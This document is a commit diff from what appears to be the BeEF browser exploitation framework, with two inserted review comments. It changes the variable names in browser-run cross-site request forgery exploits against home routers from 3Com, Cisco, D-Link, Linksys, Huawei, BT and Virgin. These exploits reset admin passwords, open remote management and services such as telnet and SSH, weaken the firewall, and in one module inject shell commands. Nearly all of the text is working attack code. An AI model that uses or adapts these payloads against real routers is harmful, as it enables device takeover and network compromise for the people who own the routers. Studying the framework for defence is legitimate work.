Add command_id to embedded iframe/img IDs for router exploits

This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
This commit is contained in:
bcoles
2013-05-27 11:56:01 +09:30
parent ab7a62e8a4
commit 639d0611a6
13 changed files with 97 additions and 84 deletions


@@ -9,8 +9,9 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var path = 'utility.cgi';
var cmd = '<%= @cmd %>';
var timeout = 15;
var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
{'type':'hidden', 'name':'testType', 'value':'1'},
{'type':'hidden', 'name':'IP', 'value':'||'+cmd}
]);
@@ -18,9 +19,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(com_officeconnect_iframe);
document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});
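Review bot: The race the commit message describes is not closed by suffixing the `var` names, because `cleanup = function() {...}` is still assigned without `var` and `setTimeout("cleanup()", timeout*1000)` evaluates a string in global scope, so two concurrent runs still share one global `cleanup`; the second assignment overwrites the first, and the first iframe is never removed. The suffixed `var com_officeconnect_iframe_<%= @command_id %>` binding was already local to the `beef.execute` callback, so the rename on its own changes nothing about what is shared. Replace the global with a closure and a function reference: `setTimeout(function() { document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>); }, timeout*1000);` and drop the `cleanup = function() {...}` block. If `beef.dom.createIframeXsrfForm` does not itself append to `document.body` (not visible here), `removeChild` would throw, so `el.parentNode && el.parentNode.removeChild(el)` is the safer form. The same pattern appears in the bt_home_hub, cisco_e2400, both ct5367, dir615, dsl500t, huawei_smartax_mt880, befsr41, wrt54g2, wrt54g and virgin_superhub sections.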


@@ -14,7 +14,7 @@ beef.execute(function() {
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'asmax_ar804gu';
img.id = 'asmax_ar804gu_<%= @command_id %>';
img.src = gateway+path+cmd;
document.body.appendChild(img);
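Review bot: Only the `img.id` assignment is changed in this hunk, while the code that later removes the element by that id is outside the hunk and not shown; if it still looks up the old literal `'asmax_ar804gu'`, the renamed image is never removed and the leak the commit message describes remains for this module. Confirm that the removal path in this file uses `'asmax_ar804gu_<%= @command_id %>'`, or avoid the id lookup altogether by keeping the `img` reference in a closure, `setTimeout(function() { document.body.removeChild(img); }, timeout*1000);`, which also avoids the string form of `setTimeout`. The enclosing `beef.execute` callback starts and ends outside the hunk.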


@@ -6,21 +6,21 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
[{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}]);
var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(bt_home_hub_iframe);
document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -7,8 +7,9 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
[
{'type':'hidden', 'name':'submit_button', 'value':'Management'},
{'type':'hidden', 'name':'change_action', 'value':''},
@@ -37,7 +38,7 @@ beef.execute(function() {
{'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
]);
var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
[
{'type':'hidden', 'name':'submit_button', 'value':'Firewall'},
{'type':'hidden', 'name':'change_action', 'value':''},
@@ -59,10 +60,10 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(cisco_e2400_iframe1);
document.body.removeChild(cisco_e2400_iframe2);
document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -6,12 +6,13 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "password.cgi");
@@ -37,16 +38,16 @@ beef.execute(function() {
input.setAttribute('value', passwd);
form.appendChild(input);
ct5367_iframe2.contentWindow.document.body.appendChild(form);
ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
form.submit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(ct5367_iframe1);
document.body.removeChild(ct5367_iframe2);
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -6,21 +6,22 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(ct5367_iframe1);
document.body.removeChild(ct5367_iframe2);
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -7,8 +7,9 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
[{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
{'type':'hidden', 'name':'apply', 'value':'Save Settings'},
{'type':'hidden', 'name':'admin_name', 'value':'admin'},
@@ -23,9 +24,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dir615_iframe);
document.body.removeChild(dir615_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -6,9 +6,10 @@
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -19,9 +20,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dsl500t_iframe);
document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -5,19 +5,20 @@
//
beef.execute(function() {
var gateway = '<%= @base %>';
var gateway = '<%= @base %>';
var username = '<%= @username %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(huawei_smartax_mt880_iframe);
document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -5,15 +5,17 @@
//
beef.execute(function() {
var timeout = 15;
var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
var befsr41_iframe = beef.dom.createInvisibleIframe();
befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(befsr41_iframe);
document.body.removeChild(befsr41_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -5,11 +5,12 @@
//
beef.execute(function() {
var port = '<%= @port %>';
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
[{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
{'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -27,9 +28,9 @@ beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wrt54g2_iframe);
document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -5,31 +5,33 @@
//
beef.execute(function() {
var port = '<%= @port %>';
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var passwd = '<%= @password %>';
var timeout = 15;
var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
[{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'0'},
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
[
{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'0'},
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
{'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':port},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':port},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wrt54g_iframe);
document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});


@@ -9,30 +9,31 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var timeout = 15;
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
]);
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
]);
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(virgin_superhub_iframe1);
document.body.removeChild(virgin_superhub_iframe2);
document.body.removeChild(virgin_superhub_iframe3);
document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
setTimeout("cleanup()", timeout*1000);
});